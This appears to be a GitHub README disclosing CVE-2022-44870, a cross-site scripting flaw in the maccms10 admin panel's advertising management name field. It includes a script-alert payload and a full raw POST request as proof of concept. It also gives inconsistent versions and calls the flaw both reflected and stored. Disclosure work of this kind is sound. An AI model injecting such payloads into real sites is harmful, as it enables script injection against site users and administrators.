Headline
CVE-2022-44870: CVE-2022-44870/README.md at main · Cedric1314/CVE-2022-44870
A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module.
CVE-2022-44870
maccms admin+ xss attacks
Overview
Manufacturer’s website information:https://maccms.pro
Source code download address : https://github.com/maccmspro/maccms10.git
- Affected version: V2021.1000.2000
2.Vulnerability details
maccmspro/maccms10#23
Go to background, go to Basics > AD Management > Name,
Insert payload1 in the name box:
It can cause XSS attacks.
Vulnerability name:Storage type xss
Vulnerability level:Medium risk
Vulnerability location: Advertising management–>name
Insert <script>alert(1)</script> at cat_title
http://127.0.0.1/admin.php/admin/banner/infocat.html
3.Recurring vulnerabilities and POC
POST /admin.php/admin/banner/infocat.html HTTP/1.1
Host: 192.168.52.163
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Origin: http://192.168.52.163
Connection: close
Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html
Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q
cat_id=&cat_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat_code=111